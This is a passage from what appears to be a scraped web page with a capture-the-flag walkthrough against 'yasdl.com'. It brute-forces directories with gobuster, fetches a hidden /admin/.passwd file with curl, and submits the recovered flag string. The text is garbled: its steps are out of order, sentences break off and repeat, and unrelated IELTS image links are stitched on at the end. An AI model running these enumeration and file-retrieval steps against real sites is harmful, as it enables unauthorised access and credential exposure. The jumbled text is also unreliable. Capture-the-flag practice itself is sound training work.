Yasdl.com: Password
$ curl -X POST -d "flag=YASDLp4ssw0rd_1s_h3r3" http://yasdl.com/submit.php The server replies:
$ gobuster dir -u http://yasdl.com -w /usr/share/wordlists/dirb/common.txt -x php,txt,html Result highlights: yasdl.com password
/admin/ /private/ /backup/ /login.php (the link we already saw) A quick directory brute‑force with gobuster (or dirsearch , dirb , etc.) helps confirm what’s actually reachable. $ curl -X POST -d "flag=YASDLp4ssw0rd_1s_h3r3" http://yasdl
/admin/.passwd (200) [size: 42] /admin/.htaccess (200) Fetching the hidden file: ), so we have found the password/flag
<!-- the password is stored in a hidden file --> That tells us to keep looking for a hidden file. We brute‑force for hidden files inside the admin directory:
$ gobuster dir -u http://yasdl.com/admin/ -w /usr/share/wordlists/dirb/common.txt -x txt,php,conf,json Output of interest:
$ curl -s http://yasdl.com/admin/.passwd YASDLp4ssw0rd_1s_h3r3 That string follows the typical flag format for the CTF ( YASDL... ), so we have found the password/flag. Most CTF platforms provide a “submit” page. The challenge often includes a submission form at /submit.php :
![Cambridge IELTS 16 Sample Answer [Driverless Vehicles]](https://ted-ielts.com/wp-content/uploads/2021/10/Sample-Band-9-Answer-440x264.png)
![Bad Behaviour in Schools [IELTS Task 2]](https://ted-ielts.com/wp-content/uploads/2022/10/Bad-Behaviour-in-Schools-IELTS-Writing-Task-2-440x264.png)
Recent Comments